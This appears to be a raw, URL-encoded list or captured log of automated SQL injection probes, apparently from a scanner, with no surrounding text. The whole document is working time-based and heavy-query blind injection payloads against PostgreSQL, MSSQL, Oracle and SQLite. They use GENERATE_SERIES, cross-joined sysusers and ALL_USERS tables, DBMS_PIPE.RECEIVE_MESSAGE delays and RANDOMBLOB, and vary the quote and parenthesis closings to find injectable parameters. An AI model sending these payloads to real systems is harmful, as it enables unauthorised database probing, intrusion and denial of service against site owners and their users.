-9241%29%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%281904%3D1904 -1475%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -8318%27%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27tNzD%27%3D%27tNzD -6218%27%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27GkMB%27%3D%27GkMB -2254%27%29%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27Qwcl%27%3D%27Qwcl -1844%27%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27IuHo%27%3D%27IuHo -6030%27%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27msWL%27%20LIKE%20%27msWL -7882%27%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27uoCH%27%20LIKE%20%27uoCH -7573%27%29%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27UcQL%27%20LIKE%20%27UcQL -1024%27%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27mnPi%27%20LIKE%20%27mnPi -7642%22%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22PwDf%22%3D%22PwDf -1100%22%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22IQUr%22%3D%22IQUr -1912%22%29%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22saSe%22%3D%22saSe -6464%22%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22zAKR%22%3D%22zAKR -7691%22%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22hoPJ%22%20LIKE%20%22hoPJ -2532%22%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22Wkvs%22%20LIKE%20%22Wkvs -4696%22%29%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22obxG%22%20LIKE%20%22obxG -8286%22%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22tABQ%22%20LIKE%20%22tABQ -2236%29%20WHERE%207426%3D7426%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -9881%27%29%20WHERE%205138%3D5138%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -2146%27%20WHERE%208902%3D8902%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -9888%22%20WHERE%207904%3D7904%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -4691%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -6215%27%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -4353%27%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -7140%22%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -1222%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%286462%3D6462 -2745%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%283368%3D3368 -3129%29%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%288007%3D8007 -9439%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -7551%27%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27jMub%27%3D%27jMub -5981%27%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27OFFM%27%3D%27OFFM -5605%27%29%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27JakE%27%3D%27JakE -3802%27%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27JKBf%27%3D%27JKBf -2709%27%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27GZFd%27%20LIKE%20%27GZFd -8051%27%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27OsHr%27%20LIKE%20%27OsHr -5920%27%29%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27SEBr%27%20LIKE%20%27SEBr -8965%27%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27vYzf%27%20LIKE%20%27vYzf -5680%22%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22eMSk%22%3D%22eMSk -6564%22%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22Fbft%22%3D%22Fbft -7011%22%29%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22FqBY%22%3D%22FqBY -7978%22%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22ewgf%22%3D%22ewgf -1028%22%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22Zzip%22%20LIKE%20%22Zzip -2453%22%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22ZXVD%22%20LIKE%20%22ZXVD -4657%22%29%29%29%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22ZDpv%22%20LIKE%20%22ZDpv -1597%22%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22gXXg%22%20LIKE%20%22gXXg -2793%29%20WHERE%201109%3D1109%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -8433%27%29%20WHERE%208047%3D8047%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -5661%27%20WHERE%205454%3D5454%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -2394%22%20WHERE%207216%3D7216%20OR%202282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -8448%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29 -8370%27%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29 -4720%27%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29 -3386%22%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29 -8980%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%288472%3D8472 -1335%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%287434%3D7434 -6255%29%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%28%287380%3D7380 -3345%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29 -8999%27%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%27dkeQ%27%3D%27dkeQ -5996%27%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%28%27yXpA%27%3D%27yXpA -9206%27%29%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%28%28%27JTDg%27%3D%27JTDg -9267%27%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%27OAPB%27%3D%27OAPB -3121%27%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%27hYkG%27%20LIKE%20%27hYkG -5516%27%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%28%27jGBs%27%20LIKE%20%27jGBs -3551%27%29%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%28%28%27GTnn%27%20LIKE%20%27GTnn -5477%27%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%27AQOi%27%20LIKE%20%27AQOi -2653%22%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%22BbcG%22%3D%22BbcG -2173%22%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%28%22xvxt%22%3D%22xvxt -3094%22%29%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%28%28%22fScJ%22%3D%22fScJ -6320%22%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%22EpoN%22%3D%22EpoN -1802%22%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%22zXeo%22%20LIKE%20%22zXeo -6206%22%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%28%22RfzP%22%20LIKE%20%22RfzP -3659%22%29%29%29%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%28%28%28%22hIEJ%22%20LIKE%20%22hIEJ -3976%22%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29%20AND%20%22tNtu%22%20LIKE%20%22tNtu -7351%29%20WHERE%209576%3D9576%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29 -9730%27%29%20WHERE%203265%3D3265%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29 -9562%27%20WHERE%201667%3D1667%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29 -1368%22%20WHERE%205463%3D5463%20OR%201889%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%28102%29%7C%7CCHR%2872%29%7C%7CCHR%28101%29%2C5%29 -4095%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -6196%27%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -7092%27%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -2213%22%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -1035%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%286317%3D6317 -2976%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%286869%3D6869 -5543%29%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%282657%3D2657 -8822%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -8281%27%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27rwUv%27%3D%27rwUv -4001%27%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27Ceiu%27%3D%27Ceiu -4766%27%29%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27rafZ%27%3D%27rafZ -9342%27%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27NCIp%27%3D%27NCIp -1104%27%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27waQy%27%20LIKE%20%27waQy -3115%27%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27xOZA%27%20LIKE%20%27xOZA -8594%27%29%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27sGQL%27%20LIKE%20%27sGQL -3780%27%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27Wvqd%27%20LIKE%20%27Wvqd -9254%22%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22QRrT%22%3D%22QRrT -1157%22%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22UPiU%22%3D%22UPiU -4408%22%29%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22KvUN%22%3D%22KvUN -4375%22%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22incO%22%3D%22incO -5007%22%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22AKOs%22%20LIKE%20%22AKOs -9432%22%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22Eniv%22%20LIKE%20%22Eniv -5501%22%29%29%29%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22QceL%22%20LIKE%20%22QceL -6392%22%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22dfXj%22%20LIKE%20%22dfXj -5458%29%20WHERE%202944%3D2944%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -4354%27%29%20WHERE%201124%3D1124%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -2665%27%20WHERE%209332%3D9332%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -9328%22%20WHERE%207030%3D7030%20OR%202637%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -5481%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -8505%27%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -8832%27%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -9319%22%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -6935%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%286504%3D6504 -4290%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%282622%3D2622 -6736%29%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%284884%3D4884 -4717%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -7134%27%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27lSHY%27%3D%27lSHY -7949%27%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27rERy%27%3D%27rERy -2252%27%29%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27wwMm%27%3D%27wwMm -8920%27%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27ztbF%27%3D%27ztbF -5469%27%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27rItL%27%20LIKE%20%27rItL -9554%27%29%29%20OR%202794%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27Hmuy%27%20LIKE%20%27Hmuy 